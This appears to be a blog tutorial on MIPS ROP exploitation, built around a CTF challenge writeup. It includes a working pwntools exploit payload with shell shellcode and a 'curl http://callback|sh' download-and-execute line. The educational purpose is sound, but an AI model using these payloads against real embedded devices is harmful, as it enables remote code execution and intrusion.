i have spent the last ~1.5 weeks in this land so obviously i am now the world's leading expert in mips exploitation. Dr. haskal, Ph.D
ok so let's get directly into this. check this out
[haskal@blahaj CTF]$ python3
Python 3.8.3 (default, May 17 2020, 18:15:42)
[GCC 10.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.arch='amd64'
>>> ROP(ELF("/bin/bash")).gadgets.__len__()
[*] '/bin/bash'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loading gadgets for '/bin/bash'
122
nice
>>> context.arch='mips'
>>> ROP(ELF("3kctf/babymips/challenge")).gadgets
[*] '/home/haskal/Documents/CTF/3kctf/babymips/challenge'
Arch: mips-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[*] Loaded 1 cached gadgets for '3kctf/babymips/challenge'
{4197288: Gadget(0x400ba8, ['syscall'], [], 0x0)}
>>>
oh,
a quick introduction to mips, in particular
- for some reason toolchains for embedded mips targets don't like to set NX1. might just be because they're old
s0-s7
are callee-saved general purpose registers. these are important because since they're callee-saved, we're going to see a lot of compiler-generated code that saves them on the stack at the beginning of functions, and loads them out of the stack at the end of functionsra
is a register for the current return address.jr ra
is the instruction used to return. so the return address is not on the stack by default! however, in functions that call other functionsra
will be saved to the stack and then loaded at the end of the function. the result of this is we can only do ROP on these functionsgp
is a "global pointer" - it's used to do library call lookups, which typically get resolved into the registert9
followed by ajalr t9
(jalr
calls a function - it Jumps And Links the return address tora
and it's using a Register)v0
andv1
are used to return values from functions anda0
-a3
are used for the first 4 function arguments- mips is outdated as hell so of course it has a delay slot: every branch and jump2 has an instruction following it which will get executed before the branch if it's taken, and also gets executed if the branch is not taken. this can be abused sometimes! ROP gadgets that jump to a delay slot skipping the call it was supposed to go with can do useful things 🦈✨
so the deal with mips rop is it's a bit complicated, and it can involve both returns (jr ra
) and calls (eg jalr t9
). there was a set of ida pro scripts for finding mips rop gadgets, which got ported to ghidra here https://github.com/tacnetsol/ghidra_scripts. now it turns out for both CTF problems and for other stuff these weren't super useful. they suffer from really poor peformance, and don't actually find gadgets that you can find manually. fundamentally i think rop finders that are based on just pattern-matching will always suffer from having false negatives. perhaps a more general and architecture-agnostic ROP tool (and perhaps a more robust one_gadget
) could combine basic pattern matching to initially narrow down the search with some symbolic execution to figure out exactly what can be controlled and what constraints need to be met. for example, i believe no naive pattern-matching ROP tools would be capable of finding gadgets that involve controllable branches before the controllable return jump
(clearly here this is extremely false negative, because there are gadgets in this binary that fit the constraints this script is looking for)
for a relevant example, this is a mips CTF problem i did a writeup for: https://git.lain.faith/BLAHAJ/writeups/src/branch/writeups/2020/3kctf/babym1ps#user-content-babym1ps
(CTFs aren't always applicable to Real Life Exploitation but it turns out there's mips stuff in the wild without NX set and without PIE and it's basically the exact scenario in this CTF problem). anyway i'm going to use this one because as usual i'm not posting real stuff on here :P - this will rehash the contents of the writeup but hopefully go more in depth and be more generalizable
some types of gadgets
let's get acquainted with stuff that can be rop'd. and here i'm going to avoid screenshotting and just dump the raw asm with ghidra annotations. some day i'll have fancey blog software that is capable of highlighting this and stuff
LAB_00446d50 XREF[1]: 00446d70(j)
00446d50 2c 00 bf 8f lw ra,local_4(sp)
LAB_00446d54 XREF[1]: 00446d10(j)
00446d54 28 00 b4 8f lw s4,local_8(sp)
00446d58 24 00 b3 8f lw s3,local_c(sp)
00446d5c 20 00 b2 8f lw s2,local_10(sp)
00446d60 1c 00 b1 8f lw s1,local_14(sp)
00446d64 18 00 b0 8f lw s0,local_18(sp)
00446d68 08 00 e0 03 jr ra
00446d6c 30 00 bd 27 _addiu sp,sp,0x30
LAB_00446d70 XREF[1]: 00446ce4(j)
00446d70 f7 ff 00 10 b LAB_00446d50
00446d74 25 10 00 00 _or v0,zero,zero
CFUN_00446d78
00446d78 00 00 00 00 nop
00446d7c 00 00 00 00 nop
this is a bog-standard mips epilogue. this one loads ra
from the stack and the loads s4
- s0
and then returns to ra
- note the delay slot, where before returning it also adds to the stack pointer, which closes this function's stack frame. these types of standard epilogues are useful for gaining control of all the s*
registers you might need to use later, in case the function that triggers your exploit doesn't give you control over the ones you want. just find another one of these epilogues that does contain a lw
for the register and then from that epilogue's ra
you can go on your way. sometimes these epilogues will also load gp
, which is useful to look for when you want to control gp
.
004474dc 10 00 bc 8f lw gp,local_20(sp)
004474e0 0d 00 44 24 addiu a0,v0,0xd
004474e4 64 80 99 8f lw t9,-0x7f9c(gp)=>->FUN_00417e40 = 00417e40
004474e8 09 f8 20 03 jalr t9=>FUN_00417e40 undefined FUN_00417e40()
004474ec 01 00 53 24 _addiu s3,v0,0x1
this is a gp
-based call, here it loads a previously saved gp
from the stack and then calculates a function offset based on it using t9
, then calls. note that this looks up a function pointer that's stored in the data section. so you can't use this gadget to call anything you want, only functions that have pointers defined to them (library calls, which is what this mechanism is for will have pointers in the GOT3). so the end result is you are usually able to call any libc or other library function using a gadget like this but importantly, only when it's resolved. for static binaries like this CTF problem, that's every function because it's static. but this specifically won't work, for example, on the uClibc thunk resolver3 because that expects gp
to be a "correct" value and will go into the weird undefined behavior zone (the kind you don't want, as opposed to the rop chain you're building which is the kind you do want). i haven't actually tested this with GNU libc but i suspect the story is the same. so basically in dynamically linked binaries you can only call stuff that has already been called by the binary. also usually you want to regain control again after this call, so you'll want to find an instance of this gadget that's in a tail call position4, and therefore by controlling gp
and the stack below including a saved ra
you can call a libc function, complete that, and then continue to the next rop gadget.
004452a8 38 00 a5 27 addiu a1,sp,0x38
004452ac 00 00 44 8e lw a0,0x0(s2)
004452b0 25 30 00 02 or a2,s0,zero
004452b4 1c 00 b3 af sw s3,local_5c(sp)
004452b8 25 c8 80 02 or t9,s4,zero
004452bc 01 00 e7 24 addiu a3,a3,0x1
004452c0 18 00 a0 af sw zero,local_60(sp)
004452c4 14 00 a2 af sw v0,local_64(sp)
004452c8 09 f8 20 03 jalr t9
004452cc 10 00 a0 af _sw zero,local_68(sp)
this is a gadget where the tail jump actually ends up being controlled by a register (s4
, which gets moved to t9
- note instead of move there is bitwise or with zero, which accomplishes the same thing), so rather than controlling the saved ra
on the stack we'd want to control a saved s4
. (this when the first type of gadget might come in handy). this also ends up being a thing that tells us where the stack is, due to moving sp
(with an offset) to a1
. but it comes with conditions! s2
must be a writable location otherwise the second instruction will segfault. you can throw in any address that's writable for that, for example a data section address if you know where data is (if there's no PIE).
so how do you actually search for gadgets assuming your tools have failed you? a strategy is to start with the goal and work backwards. the goal here is to jump to the stack to execute shellcode. to do that, we need to first know where the stack is, and then call that location. there are some gadgets that are going to let you call addresses in registers, like the previous gadget which called the address in s4
. but you can also abuse functions in the binary that take parameters of other functions. this is particularly useful with a dynamically linked binary, which is going to be smaller and might not actually have any gadgets that directly call registers that you can load sp
into
"novel" technique of the day: ret2entry
so for that i came up with a technique which under the standard naming convention would be called ret2entry
. usually when you compile a binary, main
is not the real entry point. the compiler inserts an entry point that is going to set up some basic things and then call a libc init function with the address of main. in particular, a0
will be the address of main
and the rest of the parameters get set up in order, so if you simply jump to the right place in entry with a0
set to your shellcode address it'll do the whole thing for you as if you just started the program and the shellcode is main
.
this is what this looks like (it turns out in the wild, eg with dynamic uClibc it's exactly the same except that you also need to control gp
before you return to entry because the uClibc init expects it to be un-clobbered)
**************************************************************
* FUNCTION *
**************************************************************
undefined entry()
assume gp = 0x4993a0
undefined v0:1 <RETURN>
undefined4 Stack[0x0]:4 local_res0 XREF[1]: 0040036c(R)
undefined4 Stack[-0x8]:4 local_8 XREF[1]: 00400390(W)
undefined4 Stack[-0xc]:4 local_c XREF[1]: 0040038c(W)
undefined4 Stack[-0x10]:4 local_10 XREF[1]: 00400388(W)
entry XREF[2]: Entry Point(*), 00400018(*)
00400350 25 00 e0 03 or zero,ra,zero
assume gp = <UNKNOWN>
00400354 01 00 11 04 bal LAB_0040035c
00400358 00 00 00 00 _nop
LAB_0040035c XREF[1]: 00400354(j)
0040035c 4a 00 1c 3c lui gp,0x4a
00400360 a0 93 9c 27 addiu gp=>_mips_gp0_value,gp,-0x6c60
00400364 25 f8 00 00 or ra,zero,zero
00400368 18 80 84 8f lw a0=>main,-0x7fe8(gp)=>->main = 004005e0
0040036c 00 00 a5 8f lw a1,0x0(sp)=>local_res0
00400370 04 00 a6 27 addiu a2,sp,0x4
00400374 f8 ff 01 24 li at,-0x8
00400378 24 e8 a1 03 and sp,sp,at
0040037c e0 ff bd 27 addiu sp,sp,-0x20
00400380 1c 80 87 8f lw a3=>FUN_00401020,-0x7fe4(gp)=>->FUN_00401020 = 00401020
00400384 20 80 88 8f lw t0,-0x7fe0(gp)=>->FUN_00401108 = 00401108
00400388 10 00 a8 af sw t0=>FUN_00401108,local_10(sp)
0040038c 14 00 a2 af sw v0,local_c(sp)
00400390 18 00 bd af sw sp,local_8(sp)
00400394 24 80 99 8f lw t9,-0x7fdc(gp)=>->FUN_00400870 = 00400870
00400398 09 f8 20 03 jalr t9=>FUN_00400870 undefined FUN_00400870(undefined
0040039c 00 00 00 00 _nop
LAB_004003a0 XREF[1]: 004003a0(j)
004003a0 ff ff 00 10 b LAB_004003a0
004003a4 00 00 00 00 _nop
CFUN_004003a8
004003a8 00 00 00 00 nop
004003ac 00 00 00 00 nop
with static glibc here it's easier because the libc init function doesn't care about gp
going in. so if a0
contains the address of the shellcode to call (on the stack) you return here to 0x0040036c
and let the libc handle the rest!
now it turns out for this challenge there are other gadgets you can use, you don't need to return to entry. but in a smaller dynamic binary without those gadgets it can be really useful
continuing rop
so that's settled, now you need to get sp
into a0
somehow. for this i just used ghidra search for addiu sp, a*
in the assembly listing. usually you aren't going to find straight move sp, a0
for example but you will find addiu
because there are going to be a lot of calls to stuff like memcpy
for example in the original source where a stack offset will be passed as the first or second parameter. so this works for this gadget. in this case there was no gadget for a0
but there was a gadget for a1
. that's still useful, because we can still chain it with a gadget that can move a1
into a0
, and it turns out there is such a gadget but it's not something your automated tools would ever tell you about
**************************************************************
* FUNCTION *
**************************************************************
undefined CFUN_00460e94()
assume gp = 0x4993a0
undefined v0:1 <RETURN>
CFUN_00460e94 XREF[4]: FUN_00463fc0:00464064(c),
FUN_004641f8:004642c8(c),
0047c4e4(*), 00491680(*)
00460e94 08 00 e0 03 jr ra
assume gp = <UNKNOWN>
00460e98 08 03 82 8c _lw v0,0x308(a0)
.....
00464058 25 20 a0 00 _or a0,a1,zero
-- Flow Override: CALL_RETURN (CALL_TERMINATOR)
LAB_0046405c XREF[1]: 00464000(j)
0046405c 1c 00 bf 8f lw ra,local_4(sp)
00464060 20 00 bd 27 addiu sp,sp,0x20
00464064 8b f3 00 10 b CFUN_00460e94 undefined CFUN_00460e94()
00464068 25 20 a0 00 _or a0,a1,zero
-- Flow Override: CALL_RETURN (CALL_TERMINATOR)
i found this one with more ghidra search for the exact instruction in question here, or a0,a1,zero
. now this one is spooky because it does the action you want and then branches to a location that returns to ra
. so it's interesting. but it does work, because ultimately again you have control of the return address using the stack location that ra
gets loaded from.
so basically, you start with the constraint "call the stack", find stuff that satisfies that, then find stuff that satisfies additional constraints for the step you added, and so on, like a depth first search of constraint solution space for this binary. except you'll want to stop if the current branch is getting too long and try another branch. eventually you end up with a series of rop steps that don't have any unsatisfied constraints. and that was basically it for this challenge, you get the sp -> a1
gadget, then the a1 -> a0
gadget, then the ret2entry
and you have code execution :P
let's move on to challenges for a real target. because this works in qemu-mipsel
but we might run into some weird problems if you ran this sort of exploit on a real mips device?
why?
because hardware sucks and computers are awful.
mips has two different cpu caches5, an instruction cache and a data cache. they're not coherent between each other. this means if you write shellcode it might end up in the data cache, and it might not be flushed to main memory in time so when you jump to that shellcode it'll end up jumping to stale data that isn't valid instructions and you'll get a SIGILL or something. so you need to make sure the data cache is flushed before you jump. this is annoying because the standard cacheflush
libc call takes a bunch of parameters and needs to know stuff and it's going to basically be impossible to call that. instead you can call sleep
with a small timeout, which works as i found out not because kernel context switches flush the cache (they don't), but because if you sleep for some time other stuff that's executing during the sleep will probably spam the cache enough that your shellcode entry is going to get flushed at some point. so for this, you basically need to call into libc sleep
while a0
is set to a small integer as part of your rop chain. this can actually be challenging, because for example sleep
might not be in the GOT at all, in which case you are kinda hosed because you have no idea where libc is (so you'll need a leak), or in the case of dynamic uClibc stuff, it might not be linked in yet which means if you try to call the linker thunk with a bad gp
it'll fail. this is one of those rare cases where you actually want the binary to be RELRO!
anyway, at the moment i am not actually sure what the full list of libc calls is that might be available, and easy to call, and actually will trigger cache flushes. i suspect for example that calling fork
will do the trick because the kernel must flush the pages when it marks them COW, or when it actually faults on COW pages but i'm not actually sure. for continued mips exploitdev it might be useful to actually compile a list of stuff besides sleep
that could work.
assembling the chain
once you have your series of rop steps, you need to actually put together the exploit. for this, go through each step of the rop chain and see how much it shifts the stack, and where the locations in that gadget's stack frame are. sometimes gadgets don't shift the stack, so then the frame for that gadget is the same as the next one. to get situated i usually spray a sequence of incrementing words, 0, 1, 2, 3 ... and then breakpoint the target in gdb to see which value ra
took or if it's offset by part of a word. you can also be Pro™ and use pwntools de brujin sequences for this. then, align the first stack frame including the general registers that get loaded from the stack and ra
. most of the time ra
is going to go last. do the same thing for every distinct frame in your rop chain. for the CTF example, this is what that looked like
payload = (
# frame of vulnerable function
unimportant_stuff
+ cookie # stack cookie based on an earlier leak (chonp,)
+ b"CCCC" # s8 - don't care
+ p32(0x446d50) # ra - address of gadget 1
# gadget frame for gadget 1
+ b"D"*24 # pad
+ p32(1337) # s0 - don't care
+ p32(1338) # s1 - don't care
+ p32(0x48f990) # s2 - some readable address needed
+ p32(0x40036c) # s3 - address of final ret2entry gadget (overwrite by gadget 2)
+ p32(0x464058) # s4 - gadget 3 address
+ p32(0x4452a8) # ra - gadget 2 address
# gadget frame for gadget 2 and 3
+ b"E" * 28 # pad
+ p32(0x13371337) # ra (overwritten by s3)
# gadget frame for entry
+ b"\x00" * 24 # final pad before shellcode
)
# pwntools is fun i literally don't even have to write this part myself
sc = asm(shellcraft.mips.sh())
payload += sc
here we have 3 gadget frames, which i have noted with comments. each frame ends in some saved registers and then the saved ra
register. it gets complicated because one of the gadgets overwrites the stack location for the next gadget, so we actually have the final gadget address in a previous saved register slot. in general, there are probably going to be some additional constraints to satisfy, such as this sort of overwrite or providing a valid address in some register for some offhand read or write that happens in a gadget. finally, i added a small nop sled followed by the shellcode (in mips, the nop is conveniently the null word or more literally something like or zero,zero,zero
). depending on the quality of the "get stack pointer" gadget, you may also have a situation where stack gets clobbered over your shellcode - in this case, start the shellcode with a relative branch to further down, skipping over the clobbered space, and continue from there. here's a really obtuse way to achieve this, for example
branch = asm("b next\n" + ("nop\n" * 32) + "next:" + shellcraft.mips.sh())
there also might be gadgets you can add that move the stack back up a bit so your precious shellcode doesn't get clobbered
finally, here's approximately a thing i did for having a long amount of data in a situation where i really just wanted to call a process to execute More Code, by default shellcraft assumes you don't know where the code is but you do. for example, if system
is available, then to look it up in the GOT and call it (copy that part from asm in the binary that actually does the call)
code = asm("""
addiu $a0, $sp, stack_offset+size_of_this_code
lui $gp, 0x46
addiu $gp, $gp, some_value
lw $t9, some_offset($gp)
jalr $t9
nop""") + b"curl http://callback|sh\0"
shellcraft would blow up loading that string to approximately 2x as many bytes because of loading it halfword by halfword as immediates into registers.
fin 🦈
and yeah that's it. go forth and hack some stuff !
feel free to comment if you have any questions.
personal tangent
my university was going to teach me mips but they changed the curriculum to amd64 the literal semester i took the course and i'm still angery about it because i already knew amd64 i wanted to learn mips. so i had to learn mips by myself, of course
NX is the "No eXecute" bit, which specifies that the stack and heap should be non-executable. this prevents executing shellcode that's on the stack or the heap, and means you have to use ROP
ok haskal but what's the difference between a branch and a jump?
branch instructions are used for control flow within functions and work with hardcoded offsets and jump instructions are used to call or return between functions and can work with memory addresses or registers (side note: since instructions in mips are always the word size, you can't have a literal value with the full word size. so you typically have a flow of using lui
[Load Upper Immediate] to set the top bits of a register, then addiu
to add (or subtract) the lower bits. assemblers will usually fill this process in for you if you use a literal that is too large, which gets annoying when trying to align your ROP in pwntools so always make sure you check that your shellcode is the length you think it is)
GOT is the Global Offset Table, which contains pointers to library functions that got linked in for the current process. it starts out (on mips) pointing to thunks that look up the real library function using the system dynamic linker and save it to the GOT so the next call goes directly to the real function. in static binaries, it contains pre-filled pointers to the library functions in the binary
a tail call is a compiler optimization that saves stack space in cases where functions end with a call to another function, and return that function's return value without modification. so what the compiler does is instead of keeping the current function's stack frame around it completely replaces it with the target of the tail call's frame and then jumps to that target. if you think of the stack as a physical stack of blocks, normal calls add a new block on the stack, but tail calls replace the top block with a different block. for mips this means that the compiler might do something like 1) load ra
from the stack 2) look up a library function using gp
3) jump to the function directly without linking, so now that function will return to the provided ra
. this is very useful for calling libc stuff then continuing with the rop chain
CPUs don't always read and write directly in the system RAM all the time because that would be slow. RAM is really slow compared to the speed CPUs can execute instructions at. so instead of waiting for RAM fetches all day, CPUs usually implement a cache, which is small RAM located on the CPU core that can be used to buffer reads and writes to memory for areas of the memory that are used a lot. this means if some code on the CPU reads and writes to a part of RAM 100 times, instead of waiting for 100 operations directly to RAM it will fetch that part of RAM once, put it in the cache, operate out of cache, and then flush it back to RAM later. there's usually fancey stuff like multiple levels of cache, where each level gets larger and slower (that's the tradeoff in the design, the bigger it is the slower lookups are going to be)
Comments
June 26, 2023 07:21
wow, great post. it gave me a lot of useful information. I look forward to your next posts. retro bowl
July 17, 2023 08:38
You’re absolutely right! CPUs use cache memory to improve performance by reducing the latency of accessing data from the main memory (RAM). As you mentioned, infinite fusion calculator the CPU cache is a small and fast memory that stores frequently accessed data and instructions. It acts as a buffer between the CPU and the slower main memory.